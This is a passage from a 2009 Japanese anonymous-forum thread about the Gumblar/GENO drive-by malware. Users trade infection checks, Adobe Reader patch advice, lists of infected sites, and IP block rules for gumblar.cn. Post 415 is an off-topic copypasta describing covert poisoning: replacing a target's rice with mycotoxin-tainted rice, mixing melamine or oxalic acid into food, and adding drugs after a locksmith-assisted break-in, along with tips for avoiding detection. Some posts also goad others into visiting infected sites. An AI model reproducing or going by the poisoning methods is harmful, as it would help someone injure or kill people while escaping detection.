09/05/14 11:47:15
hxxpでいいんじゃない?
401:名無しさん@お腹いっぱい。
09/05/14 11:49:33
b2rだけど、こういうのってカーソルもってっただけでもヤバイ?
402:名無しさん@お腹いっぱい。
09/05/14 11:51:10
www.example.com ←これをリンクにする専ブラもあるそうだ
ドットを●や■に変えるのをお勧め
403:名無しさん@お腹いっぱい。
09/05/14 11:51:46
URLリンク(www.fourteenforty.jp)
> 近年、Webページを閲覧する事により感染する「Drive-by-Download」マルウエアの問題が深刻化しています。
>Webブラウザやプラグイン、アプリケーションの脆弱性を利用してシステムにインストールされる事例が多発しており
GENOウイルスのことですね。よくわかりました。w
404:名無しさん@お腹いっぱい。
09/05/14 11:54:39
384のはこのスレに貼られる前からあちこちのスレに貼られてるな
405:名無しさん@お腹いっぱい。
09/05/14 11:55:29
↑気づいたのは今だよ
406:名無しさん@お腹いっぱい。
09/05/14 11:57:05
vista使いは丸腰でブラブラしてても良いのかね
407:名無しさん@お腹いっぱい。
09/05/14 12:34:23
>>406
よう俺
最近この話題知ったんだ
一応チェックはしておきたい
408:名無しさん@お腹いっぱい。
09/05/14 12:39:02
逆にこれはホームページを持ってるとわかりやすいってこと?
htmlアップロードすりゃ感染してるかどうかわかるよな?
409:名無しさん@お腹いっぱい。
09/05/14 12:42:05
ラトビア特急、ゆっくりと路線縮小中
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/30(木) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
中々収束しないな orz
410:名無しさん@お腹いっぱい。
09/05/14 12:44:00
違う。
clientとserverの違いを考えろ。
お前はclientだろうが
411:名無しさん@お腹いっぱい。
09/05/14 12:46:01
>>386
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
> つまり、「再接続させる」って意味でしょうね
「俺スルドイこと言った」とか思ってる?
412:名無しさん@お腹いっぱい。
09/05/14 12:47:04
>>409
インフルの感染者を見ているようだ
413:名無しさん@お腹いっぱい。
09/05/14 13:00:30
【ネット】 小林製薬ウェブサイトの一部でサイト改ざん、現在は閉鎖 閲覧者にはウイルス感染の恐れ [09/05/12]
スレリンク(bizplus板)
414:名無しさん@お腹いっぱい。
09/05/14 13:34:38
>>409
これは延べ数?
415:名無しさん@お腹いっぱい。
09/05/14 13:41:38
汚染米とラジコン
スレリンク(radiocontrol板:337-番)
スレリンク(bouhan板:20-番)
カビ毒米って便利いいよね。
普通に食べて肝臓癌にして殺すことできるもんね。
気づかれずに何度も侵入、そのたびに米びつのお米をカビ毒米と交換、
後マヨネーズや醤油、ソース、ケチャップ、みりんなどなど毎日少しずつ使うものに弱毒性の毒物を入れておく。
ターゲットは一年以内にアポーン。
気づかれそうになったら若年性統合失調症とか何とかいえば誤魔化せます。
URLリンク(www.tk-telefilm.co.jp)
夜になると不思議と暗くなる部屋のガス灯…それに気づくのは私だけ…。
精神的に追詰められる心理サスペンスの傑作!
昔々から精神病ってエロエロと利用し甲斐があるようで、、、、
ガスライティング----で検索 ガス燈の映画の影響か欧州ではよく知られた方法
メラミンやシュウ酸の粉末を砂糖や塩、牛乳に混入。確実に結石(総胆管結石、尿管結石)になる。
あかちゃんなら異物混入が疑われるが40代50代なら本人の病気ですんでしまう。
あと降圧剤や昇圧剤、利尿剤などなどいろいろあるみたいだね。
これらは砒素のように明らかな毒物でもないから発見されても犯罪の立証がむずい。
薬物毒物と鍵屋の組み合わせは非常に厄介だ。
プロの鍵屋にかかれば開かない鍵はないといわれている。
皆さま、家族全員が留守にする時はお気をつけあそばせ。
あと、尿酸とある種の(現在不明)ある種の薬物を加えると膝痛や腰痛を起こすことが出来るようだ。
重いものを持っていないのに急に腰が痛くなったなどというとき、
ひょっとすると、ひょっとするかもしれませんよ。
旅先での見も知らない人からのドリンクサービスや席を外したあとの飲み物なども危険がいっぱいですよ。
泊りがけの飛行会の後体調異変はありませんか。
---------------------------------------------
みんな気をつけようね。
どんな一流の鍵屋でも無傷で開けられない鍵作らないと、、
現状では一流の鍵屋ならどんな鍵も開けてしまう。
暴力団が借金漬けの鍵屋を支配下に置いたらやりたい放題だよ。
416:名無しさん@お腹いっぱい。
09/05/14 13:46:07
感染の確認方法は?
417:名無しさん@お腹いっぱい。
09/05/14 13:49:33
>>414
延べ数なら減らないだろ
418:名無しさん@お腹いっぱい。
09/05/14 13:50:32
gumblar.cnへの接続を遮断してもダメ?
419:名無しさん@お腹いっぱい。
09/05/14 13:51:28
まだ感染してない人はバックアップ取っとけよ、新規インスコは設定がめんどい
もちろんほとんどの人は設定済みリカバリ用意してるだろうけど
420:名無しさん@お腹いっぱい。
09/05/14 13:54:57
gumblar.cnにaguseで行ったらadblockのgumblar.cnカウントが5になってんだけど
これ大丈夫だよね?
もしabblockでgumblar.cnをブロックしてないと、abuseでgumblar.cn見ても駄目なんじゃ?
421:名無しさん@お腹いっぱい。
09/05/14 13:57:51
〉〉419
感染の真偽はまだわからないが、
リカバリーディスク作ってなかった僕はどうすればいいでしょうか?
422:名無しさん@お腹いっぱい。
09/05/14 13:59:46
>>421
クリーンインストール
423:名無しさん@お腹いっぱい。
09/05/14 14:09:41
プリインストールじゃなければいいけど
424:名無しさん@お腹いっぱい。
09/05/14 14:11:55
>>420
まじだな
aguseで怪しいサイト踏みまくったんだが・・・・
おれもgumblar.cnがカウントされてた
425:名無しさん@お腹いっぱい。
09/05/14 14:17:54
〉〉423
プリインストールでした本当に(ry
詰んだか?OSはVISTAだけども、、、
後処置法何かある?
426:名無しさん@お腹いっぱい。
09/05/14 14:18:45
すまん、Adobe Acrobatとreaderってどう違う?
プログラムの削除画面で、Acrobatがなくてreaderしかないんだが、readerだけアップデートしとけば良いってことなんだろうか?
427:名無しさん@お腹いっぱい。
09/05/14 14:21:39
>>426
Acrobatは有償の製品版。PDF作成機能がある。
428:名無しさん@お腹いっぱい。
09/05/14 14:23:44
>>420>>424
マジか
ヤバすぎるだろaguse
429:名無しさん@お腹いっぱい。
09/05/14 14:23:46
誰か>>304にも答えてほしいです。
vistaだしjavaスクリプトも切ってるから一応このままアップデートしなくても大丈夫かな・・・?
430:名無しさん@お腹いっぱい。
09/05/14 14:24:26
>>425
VistaでGenoに感染したのなら、初の例じゃないか?
JavascriptはVer.6以上のWindowsをはねてるし。
431:名無しさん@お腹いっぱい。
09/05/14 14:24:49
read:読む[er]
readerが9.1.0ならreader開いてヘルプのとこから9.1.1にアップデートできる
あと設定からAdobereaderJavaScriptも切っとけ
432:名無しさん@お腹いっぱい。
09/05/14 14:25:33
URLリンク(www.google.com)
2009/04/09(木) 7560 個
2009/04/17(金) 8567 個
2009/04/19(日) 11795 個
2009/04/27(月) 15096 個
2009/04/28(火) 13612 個
2009/05/03(日) 13456 個
2009/05/14(木) 12314 個のドメインを感染させています。
URLリンク(www.google.com)
2009/05/03(日) 623 個
2009/05/06(水) 1108 個
2009/05/07(木) 1951 個
2009/05/08(金) 1437 個
2009/05/09(土) 648 個
2009/05/14(木) 24 個のドメインを感染させています。
433:名無しさん@お腹いっぱい。
09/05/14 14:27:10
>>430
そっか。XPでもUAを偽装しておけばGenoを防げるなw
434:名無しさん@お腹いっぱい。
09/05/14 14:27:27
>>420
怖いからVMwareでやってみた
俺もgumbarがカウントされてることを確認した・・・・
435:名無しさん@お腹いっぱい。
09/05/14 14:28:06
>>427>>431
わかった。あり。
436:名無しさん@お腹いっぱい。
09/05/14 14:28:17
>>430
いやまだカスペチェックしてないからワカラン
しかしIEがよく落ちたりするからさ
437:名無しさん@お腹いっぱい。
09/05/14 14:31:44
感染の確認方法おしえろやクズ
438:名無しさん@お腹いっぱい。
09/05/14 14:34:54
>>437
クズに教えを請うなんて恥ずべきことだぞ
439:名無しさん@お腹いっぱい。
09/05/14 14:37:25
再起動して戻ってこれたら感染してない
440:名無しさん@お腹いっぱい。
09/05/14 14:42:22
千葉女どこいっちゃったの
寂しいから出てこいよ
441:名無しさん@お腹いっぱい。
09/05/14 14:44:37
???
442:429
09/05/14 14:44:38
もしかしたら自分の質問は初心者すぎるからスルーされているのかな、と思うので
セキュリティ初心者質問スレに移動してよかですか?
マルチになる?
443:名無しさん@お腹いっぱい。
09/05/14 14:50:32
該当バージョンのアップデートを>>292でDLできないか
444:名無しさん@お腹いっぱい。
09/05/14 15:03:39
>>420
>adblockのgumblar.cnカウントが5になってんだけど
これってフィルタに「gumblar.cn」って入れてるってこと?
445:名無しさん@お腹いっぱい。
09/05/14 15:04:21
>>443
すんません、できました。
騒いで申し訳ないです。
有難うございます。
446:名無しさん@お腹いっぱい。
09/05/14 15:12:41
>>420
「gumblar.cn」をフィルタリングしてるなら
aguseで編集したアドレスにgumblar.cnという文字列が含まれるからだと思われ
gumblar.cnのIP「94.229.65.160 - 94.229.65.191」がブロックはアクセスしてないし
ブロックもカウントされなかったから、そういうこと
447:名無しさん@お腹いっぱい。
09/05/14 15:13:50
>>444
>>446
安心した ありがとう
448:445
09/05/14 15:13:52
すみません、もうちょっとだけ質問。
>>297はあまり気にしなくてもOK?
確かにプロパティみると9.1のままだけど。
449:名無しさん@お腹いっぱい。
09/05/14 15:15:39
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
450:名無しさん@お腹いっぱい。
09/05/14 15:16:14
>>449
えっ
451:名無しさん@お腹いっぱい。
09/05/14 15:18:22
>>446
何だaguseのアドレスに反応しただけか!
あー安心したありがとう
452:名無しさん@お腹いっぱい。
09/05/14 15:19:14
>>448
Adobe Reader 9.1.1 Update - Multiple Languagesはやった?
453:名無しさん@お腹いっぱい。
09/05/14 15:19:20
>>450
えっ
454:名無しさん@お腹いっぱい。
09/05/14 15:20:36
>>447
安心したついでに質問だけどいいかな
adblockのフィルタリングはこんな感じでいいのかな
*/94.229.[64-65].[0-255]/*
*/94.247.[2-3].[0-255]/*
455:名無しさん@お腹いっぱい。
09/05/14 15:31:11
>>413
GENOだね
456:名無しさん@お腹いっぱい。
09/05/14 15:31:50
なにそれこわい
457:名無しさん@お腹いっぱい。
09/05/14 15:32:28
>>454
URLリンク(www3.atword.jp)
ここの下のほうの焼却炉ってところにたくさん禁止したほうがいいアドレスあるから使ってみたらどうだい?
だけどabblockよりルーターとかPCのFWに設定しておいたほうよさそう
何か俺が勘違いしていたらごめんね
458:名無しさん@お腹いっぱい。
09/05/14 15:32:33
>>454
URLリンク(web-g.org)
ここ見て*/94.247.[2-3].[0-255]/*は入れたんだけど
*/94.229.[64-65].[0-255]/*も入れた方がいいの?
自分も知りたいから、詳しい人お願いしますm(_ _)m
459:名無しさん@お腹いっぱい。
09/05/14 15:32:33
JavaScriptの正規表現だからそれでOK
/*とか無くてもいい
460:名無しさん@お腹いっぱい。
09/05/14 15:32:45
Adobe Readerを使う時だけインストして使い終わったらアンインストすればいいんじゃないか
すげええ面倒だけど
461:名無しさん@お腹いっぱい。
09/05/14 15:32:50
aguseの件はマジびびった。
ミイラ取りが。。になったかとおもたよ
462:名無しさん@お腹いっぱい。
09/05/14 15:39:02
>>454
これってoperaの場合どうやればいいの?
463:名無しさん@お腹いっぱい。
09/05/14 15:41:25
adblockにIPアドレスベースのアクセスフィルタ機能はないでしょ
464:名無しさん@お腹いっぱい。
09/05/14 15:42:53
425だが、
OSvistaでGENO大丈夫かと思うが心配だから
カスペ使おうと思ったがセキュリティソフトがマカフィで機能の一時停止ができない、、
他にできる確認方法ある?
WINDOWSのsqlsodbc.chmのチェックくらい?
探してもないんだが、、
465:名無しさん@お腹いっぱい。
09/05/14 15:44:56
>>459
>>463
どっちが正しいの?
466:名無しさん@お腹いっぱい。
09/05/14 15:48:24
踏んでみれば分かる
467:名無しさん@お腹いっぱい。
09/05/14 15:49:49
>>466
えええええええええええええええええ
468:名無しさん@お腹いっぱい。
09/05/14 15:49:58
カスペのオンラインスキャンの事を言ってるなら
ニフティのが同一らしいのでそっち使うといい
469:名無しさん@お腹いっぱい。
09/05/14 15:53:01
>>448
ヘルプ>アクロバットリーダー9について の所で
バージョン9.11になっていなければパッチ適用されてない
470:名無しさん@お腹いっぱい。
09/05/14 15:56:08
>>413
>小林製薬によれば、ユーザーが感染した恐れがあるのはダウンローダー型のトロイの木馬。主な動作としては、
>改ざんされたページにアクセスした場合、別のページからウイルスやスパイウェアをダウンロードするという。
>また、感染した場合には、「sqlsodbc.chm(C:\WINDOWS\system32\sqlsodbc.chm)が改変されるほか、
>コマンドプロンプトとレジストリエディタが起動不能になることが確認されている
ああ、間違いないGENOだ。
471:名無しさん@お腹いっぱい。
09/05/14 15:56:50
>>436
カスペのサポセンに聞いたらチェックする時に設定を推奨レベルではなく高にして
何度かやってみてくれと言われた。それで感染の有無が分かるはずだってさ
472:名無しさん@お腹いっぱい。
09/05/14 15:59:04
>>471
オンラインスキャンでも同じ?
てかわざわざサンクス
473:名無しさん@お腹いっぱい。
09/05/14 15:59:44
>>464
ニフティのがカスペエンジンだったはず。
そっち使ってみては?
474:名無しさん@お腹いっぱい。
09/05/14 16:03:10
>>473
サンクス
475:名無しさん@お腹いっぱい。
09/05/14 16:06:08
>>466
俺xpだから、だれかadblock入れてる人>>454のフィルタ入れて>>384踏んでみてよ
お願いします
476:名無しさん@お腹いっぱい。
09/05/14 16:07:48
>>413
小林製薬はこのウイルスに面白いネーミングをつけてくれるはず
477:>>448
09/05/14 16:07:49
>>452
はい。>>292さんの所からやりました。
更新日時も今日の15時ぐらいになってます。
でも9.1(9.10のことですよね)のままです。
478:名無しさん@お腹いっぱい。
09/05/14 16:11:15
>>468
>>452
9.1.1になってました!
ほんとーーーに有難うございます!
479:名無しさん@お腹いっぱい。
09/05/14 16:12:34
>>469
スマソ間違えた。
本当に有難う!
480:名無しさん@お腹いっぱい。
09/05/14 16:14:40
どんなソフトも大体そのへんにバージョン表示されるからw
481:名無しさん@お腹いっぱい。
09/05/14 16:16:40
>>477
Product Adobe Reader
Version 9.1.1
Platform Windows
File Name AdbeRdrUpd911_all_incr.msp
File Size 1168 KB
これだぞ URLリンク(www.adobe.com)
482:名無しさん@お腹いっぱい。
09/05/14 16:18:16
感染してた!
sqlsodbc.chm見事に改変されてるううう
クリーンインストールしてくる…
483:名無しさん@お腹いっぱい。
09/05/14 16:27:07
>>482
いってら~
484:名無しさん@お腹いっぱい。
09/05/14 16:30:57
WinXPつかっててGDATAがアクセス拒否した。
ウェブサイトがブロックされました。
G DATA InternetSecurity 2009 がこのウェブサイトへのアクセスを拒否しました。
このサイトは感染しています。感染コード: JS:Redirector-H2 [Trj] (エンジン B)
保存してソース見たかったけどそれも出来なかった(拒否される)からエミュのWindows98でアクセスしないように保存して、ソース見た。
URLリンク(ghard.run.buttobi.net)
…これ? エミュでもアクセスして感染するとハードディスクファイルを戻すのが面倒だからね、、、
Javascriptはいつも切ってるけどこれなら感染しないのかな。
485:名無しさん@お腹いっぱい。
09/05/14 16:35:07
めっさ伸びとる
486:名無しさん@お腹いっぱい。
09/05/14 16:37:25
>>470
ファイル実行regeditで
起動すればセーフって事?
487:名無しさん@お腹いっぱい。
09/05/14 16:38:59
ガチでパニックが起きそうだな
488:名無しさん@お腹いっぱい。
09/05/14 16:39:34
>>285
489:名無しさん@お腹いっぱい。
09/05/14 16:41:52
インフルよりアレかもね。
490:名無しさん@お腹いっぱい。
09/05/14 16:42:26
URLリンク(update.microsoft.com)
これだめなん?
491:名無しさん@お腹いっぱい。
09/05/14 16:44:22
あっちはいまのところ他人事だけど、こっちは目の前の火事だからな
492:名無しさん@お腹いっぱい。
09/05/14 16:46:15
ワクチンないもんね。
フルインスコでなおるつっても邪魔くさいし。
493:名無しさん@お腹いっぱい。
09/05/14 16:47:55
とにかくここに書いてあるIPを範囲焼き
URLリンク(www3.atword.jp)
494:名無しさん@お腹いっぱい。
09/05/14 16:52:05
薬事日報→小林製薬という流れか?
495:名無しさん@お腹いっぱい。
09/05/14 17:00:09
笑い男事件
496:名無しさん@お腹いっぱい。
09/05/14 17:00:31
>>480
そうなんですね。
全然知らなかった。
一つ賢くなったよ、有難う。
>>481
はい。
それやりました。
URLが紫になってます。
「URLが紫になってます。」だって。
初心者すぎて自分で泣けてくる。
497:名無しさん@お腹いっぱい。
09/05/14 17:27:43
>>374-
乙です
一応、電凸して対応する様伝えました
498:名無しさん@お腹いっぱい。
09/05/14 17:40:37
>>497
電凸した反応はどうだった?
499:名無しさん@お腹いっぱい。
09/05/14 17:42:41
>>482
感染したのはビスタの人でつか?
500:名無しさん@お腹いっぱい。
09/05/14 17:45:09
早く普通に駆除できるようにならんのかな
501:名無しさん@お腹いっぱい。
09/05/14 17:54:24
>>499
ビスタにsqlsodbc.chmはないから違うと思う
502:名無しさん@お腹いっぱい。
09/05/14 17:57:59
>>498
横柄の極み
同じ事を何度も言わせるわ、待たせるわ
PHSで東京から大阪まで電話代が幾ら掛かるか配慮もせんと
一回氏ね、みたいなw
503:名無しさん@お腹いっぱい。
09/05/14 18:00:45
>>501
㌧クス。
ビスタまで殺られたと思ってUNKOもらすとこだった!
504:名無しさん@お腹いっぱい。
09/05/14 18:06:24
374=384です
avastで、全ドライブをチェックかけましたが、ウイルスは検出されませんでした
これは、最初のアラート音が鳴った時に、ページを開く前にウイルスのコードをavastが発見して
実行するのを未然防止したと考えて良いんでしょうか?
それとも、もはやavastでも検出できないような姿に変化して、ブート領域にウイルスが住み着いているんでしょうか?
何か、ウイルスに感染しているかどうか確かめる方法(どっかのディレクトリの特定ファイルが削除されているとか、
改変されているとか、新しく特定名称のフォルダ、ファイルが作られているとか・・・)ってありませんか?
とりあえず、avastで全ドライブをチェックかけて、何も出て来なければ、感染を未然に防止できたと考えてOKでしょうか?
505:名無しさん@お腹いっぱい。
09/05/14 18:07:06
たった今、うっかりGENOのホームページに行ってしまったんだがまだヤバいの?
詳しいこと知らないので、心臓バクバクいってます。
506:名無しさん@お腹いっぱい。
09/05/14 18:11:00
>>471だけどカスペ先生の更新時期がもう直ぐavastは
無料なのにGENOウイルス検知するほど性能がいいのか・・
更新しないでavast使ってみようかなぁ
スレチでスマン
507:名無しさん@お腹いっぱい。
09/05/14 18:18:45
今回はたまたまavastが頑張ったという気もするけど
うちはavast+定期的に他社オンラインスキャンで今までウィルスに引っかかった事は無いかな
508:名無しさん@お腹いっぱい。
09/05/14 18:22:17
>>493
URLリンク(up2.viploader.net)
一時間かかった・・・・・
PCtoolは設定が面倒だなぁ
509:名無しさん@お腹いっぱい。
09/05/14 18:32:08
うちのルーターはIP焼き設定数上限に達しやがったぜ・・・
510:名無しさん@お腹いっぱい。
09/05/14 18:32:37
>>481
なぜか実際のサイズが
2,150,400 バイト
511:名無しさん@お腹いっぱい。
09/05/14 18:40:05
>>374>>497
今そこはサイトメンテナンスしているようだ
ユーザー名とパスワードを要求してくるな
512:名無しさん@お腹いっぱい。
09/05/14 18:49:18
IPブロックって、
peergurdianなんかでやるんですか?
513:名無しさん@お腹いっぱい。
09/05/14 18:51:52
GENOウイルスってトロイの木馬らしいですが、具体的にどういう悪さをするんですか?
514:名無しさん@お腹いっぱい。
09/05/14 18:55:19
スレ嫁
515:名無しさん@お腹いっぱい。
09/05/14 19:05:04
スレをざっと見渡した感じでは、良く挙動が分かっていないってことですかね?
516:名無しさん@お腹いっぱい。
09/05/14 19:33:04
>>515
そう書けば、誰かが教えてくれると思った?
面倒な人だね
517:名無しさん@お腹いっぱい。
09/05/14 19:35:05
書き込み>>425だが、チェックしてきたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:管理者モードでIE起動方法わからず・・・orz△
3がチェックできれば完璧なんだが・・・
518:名無しさん@お腹いっぱい。
09/05/14 19:41:44
WHOのパンデミック警報はフェーズ5だけど、
このウイルスはフェーズ幾つぐらいよ?
519:名無しさん@お腹いっぱい。
09/05/14 19:43:54
>>516
いや、思いませんでしたよ
2chは不親切な人が多いですから
520:名無しさん@お腹いっぱい。
09/05/14 19:58:58
>>518
もうフェーズ6レベルじゃね?
収まる気配ゼロだし
521:名無しさん@お腹いっぱい。
09/05/14 20:05:00
>>517
カスペはやらなかったのか
522:521
09/05/14 20:05:52
あ、すまん、ニフやってきたのね
523:名無しさん@お腹いっぱい。
09/05/14 20:24:37
・sqlsodbc.chmを改変
・cmd.exe、regedit.exeが起動不能
・一部のアンチウイルスソフトが更新不能
・特定サイトにアクセス不能(Windows Update、アンチウイルスソフト関連サイト)
・ネットワークのトラフィックを監視、ユーザー名やパスワード等の情報を収集
・Googleの検索結果を改竄(リンクを弄る)
・explorer.exeや一部のブラウザが異常終了
・Acrobatが勝手に起動
・PDFファイルやシステムファイルが増殖
・CPU、メモリ使用率がUP
・再起動時にBSOD
524:名無しさん@お腹いっぱい。
09/05/14 20:26:32
>>522
一応事故解決してニフでチェックでできたお
【OS】Vista
【セキュリティソフト】マカフィ
【ウィルスを疑った理由】saymoveの利用・IEのフリーズ
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
【結果】
1:正常に起動○
2:改変は無し○
3:ウィルスはなし○
ということで一応大丈夫みたい
ただちにウィルス更新とバックパックしてきま
525:名無しさん@お腹いっぱい。
09/05/14 20:26:57
>>484
unescape~replaceの右上にgumblarが出てるな。
526:名無しさん@お腹いっぱい。
09/05/14 20:29:20
>>523
Googleの検索結果を改竄って初めて見るが、何処の情報?
527:名無しさん@お腹いっぱい。
09/05/14 20:30:35
>>526
ほい。
UnderForge of Lack ≫ Blog Archive ≫ ScanSafe reported the zlkon virus progress
URLリンク(www3.atword.jp)
528:名無しさん@お腹いっぱい。
09/05/14 20:31:39
>>523
何でもありだなw
529:名無しさん@お腹いっぱい。
09/05/14 20:32:15
XP厨はいつ何時やられるかわからず冷や冷やもんだな
530:名無しさん@お腹いっぱい。
09/05/14 20:40:01
>>523
なぶり殺しと言うか、何と言うか…。
いっそ、HDDを綺麗さっぱりフォーマットしてくれた方が…。
531:名無しさん@お腹いっぱい。
09/05/14 20:40:56
google検索改竄して自サイトへアクセスさせようとするのかな
532:名無しさん@お腹いっぱい。
09/05/14 20:46:59
終息してるし次スレは要らないね。
533:名無しさん@お腹いっぱい。
09/05/14 20:48:06
>>531
アフィリエイト狙いらしい。
そこから足が付きそうだけど、匿名口座とかも使ってるんだろう。
534:名無しさん@お腹いっぱい。
09/05/14 20:48:17
>>532
GENO社員乙
535:名無しさん@お腹いっぱい。
09/05/14 20:49:43
>>527
thx
536:名無しさん@お腹いっぱい。
09/05/14 20:54:36
このウイルス、VISTAはスルーなんだって?
俺、XPなんだけど
cmd.exe、regedit.exeが起動したってことは
感染してないってことおkなんだよね?
537:名無しさん@お腹いっぱい。
09/05/14 20:54:51
>>533
なるほど、意外とこすいなぁw
538:名無しさん@お腹いっぱい。
09/05/14 20:55:03
>>532
逆に拡散してると思うがw
539:名無しさん@お腹いっぱい。
09/05/14 20:56:16
>>536
念のために
【確認手段】
1:PCの再起動が正常か否か
2:sqlsodbc.chm の改変の有無
3:ニフティでのオンラインチェック
ぐらいはしておいたほうが・・・
540:名無しさん@お腹いっぱい。
09/05/14 20:57:58
>>523
・ゾンビ化も追加
ソースは>>324
>>530
生かさず殺さずだね
541:名無しさん@お腹いっぱい。
09/05/14 20:58:16
VISTA感染報告きてるね
542:名無しさん@お腹いっぱい。
09/05/14 20:59:01
まだ未確定の段階か
543:名無しさん@お腹いっぱい。
09/05/14 21:00:22
>>541
まじすか?
544:名無しさん@お腹いっぱい。
09/05/14 21:01:02
>>508
素直にPG2で設定しろよ。
545:名無しさん@お腹いっぱい。
09/05/14 21:02:17
>>532
なんか久しぶりだな。GENO社員乙w
546:名無しさん@お腹いっぱい。
09/05/14 21:06:01
・Googleの検索結果を改竄(リンクを弄る)
↑これどうやって確認すればいいの?
547:名無しさん@お腹いっぱい。
09/05/14 21:08:38
>>543
まだ詳しいことかいてないからわからないけど、一応貼っとくね
***
あの有名動画サイトSayMove!がGenoウイルスに感染、アクセスした乞食どもやばいぞ
スレリンク(news板:864番)
864 名前: キクザキイチゲ(中国地方)[sage] 投稿日:2009/05/14(木) 20:24:48.23 ID:0ZvJo5LH
該当時間のsaymoveにアクセスした後、パソコンの挙動がえらい不安定に
なったんだけど、やっぱりこれって喰らってしまったんでしょうか?。
ビスタHomePremium64bit+avast!なんですけど、
頻繁にフリーズするようになった(PCを購入して約2年一度も無かったのに、
一昨日から今日までに7回もフリーズ。)
あと、ついさっき、
スリープにしてても勝手に復帰している
スリープから復帰して暫くすると、HDDを認識しないようになる
といった症状がでた。
一応、カスペルスキーのオンラインスキャンの重要な部分だけを試して
みたけど、検出はされませんでした。トレンドマイクロの方も同様。
報告されている症状と全く違うんですが、どうなんでしょ?。
548:名無しさん@お腹いっぱい。
09/05/14 21:11:54
>>546
アフィのスクリプトをひとつずつページソースで確認するしかないでしょ。
549:名無しさん@お腹いっぱい。
09/05/14 21:19:11
>>548
面倒だなw
firefoxなんだけどWOT(Web of Trust)とか入れてもだめなのかな?
ちなみにWOTって「分かりやすく色分けされたWOTアイコンによって
サイトへのリンクをクリックする前に、オンライン詐欺、なりすまし
不審なショッピングサイト、セキュリティの脅威などを回避できます」
というアドオンですが、自分は入れてません
550:名無しさん@お腹いっぱい。
09/05/14 21:27:16
avastさんが感知してくれたのに誤作動だと思って突っ込んで感染した俺だけど
やっぱりIEがよく反応無しになる、おまけにパソゲーも反応無しになる
今カスペルスキーってとこでオンラインスキャンしてるが
このウイルスはどこに感染するんだ?32のチェックはもう終わったみたいだが
何も検出されなかったぞ?
全領域でやったら一件検出されたが何か勝手に止まったわ
551:名無しさん@お腹いっぱい。
09/05/14 21:29:10
ググれば一番上にくるからすぐ分かると思うけど「ライブハウス あさがやドラム」の
サイトも怪しいらしいのですが、誰かvistaの人確認してくれないかなw
552:名無しさん@お腹いっぱい。
09/05/14 21:29:54
>>550
感染が確実なら時間勿体無いから即リカバリしたほうがいいよ。
疑心暗鬼で使い続けるのは精神的に辛いでしょ
553:名無しさん@お腹いっぱい。
09/05/14 21:32:09
>>550
新種が毎日出ててカスペも新種は当然スルー
554:名無しさん@お腹いっぱい。
09/05/14 21:32:22
>>552
代えのHDDがねえんだよっ!仕事ねえからさ・・・
555:名無しさん@お腹いっぱい。
09/05/14 21:35:39
Aviraは感知してくれる?
誤作動はないし、>>539でチェックしても問題ないから、
いまんところ被害はないと思うけど、
怖いものみたさで問題サイト踏んでみたいという妙な欲望も・・・
556:名無しさん@お腹いっぱい。
09/05/14 21:36:23
>>551
感染してる
557:名無しさん@お腹いっぱい。
09/05/14 21:39:05
>>556
おおっ!!
ありがとう勇者様、一昨日は大丈夫だったらしいんだが・・・
なんか被害拡散してるなw
558:名無しさん@お腹いっぱい。
09/05/14 21:40:42
何れにしても中古の使い捨てPCでよかったよ。
559:名無しさん@お腹いっぱい。
09/05/14 21:40:51
これってプログラムが書き換えられるだけみたいだし
システムの復元とか使えないんだろか?
560:名無しさん@お腹いっぱい。
09/05/14 21:44:36
>>559
フルバックアップでもなければ無理だろ。
561:名無しさん@お腹いっぱい。
09/05/14 21:46:09
>>559
>システムの復元
それのほうが怖いよw
562:名無しさん@お腹いっぱい。
09/05/14 21:46:35
スレの伸び方が恐ろしい。
急に拡散した?
563:名無しさん@お腹いっぱい。
09/05/14 21:47:32
>>559
そんな無意味な事するくらいならインストールしなおすわ。
564:名無しさん@お腹いっぱい。
09/05/14 21:50:40
>>562
前から拡散、大手・個人の各サイトが隠蔽・感染に気づかず
新型インフルを超えた・・・。しかし、山田みたいに話題にも
あがらない・・・
565:名無しさん@お腹いっぱい。
09/05/14 21:51:03
>>544
こんなのあるのか
thx
566:名無しさん@お腹いっぱい。
09/05/14 21:51:43
>>549
中の人やユーザの評価で安全か有害か決めるんならあまり頼れないんじゃない?
567:名無しさん@お腹いっぱい。
09/05/14 21:56:18
PeerGuardian 2 for Windows β6b 日本語第2版
URLリンク(www.dukedog.flnet.org)
繋がらなくて落とせねぇ
568:名無しさん@お腹いっぱい。
09/05/14 21:57:36
>>566
だよね・・・
569:名無しさん@お腹いっぱい。
09/05/14 21:58:08
>>562
小林製薬(>>351)とネラーに利用者が多そうなSayMove!(>>282)の感染が発覚。
570:名無しさん@お腹いっぱい。
09/05/14 22:02:05
小林製薬が感染したことで、PCライトユーザーにも十分認知されればいいんだけど。。
571:名無しさん@お腹いっぱい。
09/05/14 22:02:28
これはググルさんが公式に対策に乗り出したってこと?
Google Safe Browsing diagnostic page for gumblar.cn
URLリンク(google.com)
Gumblar hitting Googlers hard
URLリンク(www.daniweb.com)
Large amount of cross-site scripting attacks see websites compromised - SC Magazine UK
URLリンク(www.scmagazineuk.com)
572:名無しさん@お腹いっぱい。
09/05/14 22:02:29
潜在感染者が多そうだな。
573:名無しさん@お腹いっぱい。
09/05/14 22:03:35
>>568
てゆうかWeb of Trustでググッたこのサイトは大丈夫かな?
URLリンク(d.hatena.ne.jp)
なんかもうどのサイトも不安になってきたよ
できたらチェックお願いVISTAの方
574:名無しさん@お腹いっぱい。
09/05/14 22:11:47
>>573
俺XPなんで、対策してても怖くて踏めませんw
ところで>>129が繋がんないんだけど、俺だけ?
575:名無しさん@お腹いっぱい。
09/05/14 22:11:55
ウイルスセキュリティZEROのサイトのサービスが止まってるってよ。
576:名無しさん@お腹いっぱい。
09/05/14 22:15:00
VMware導入した。ウイルスの挙動を確かめたいんで、感染済みのサイト教えてくれ。
あとAcrobat Reader9.1でも感染するっけ?
577:名無しさん@お腹いっぱい。
09/05/14 22:19:20
>>576
>>551
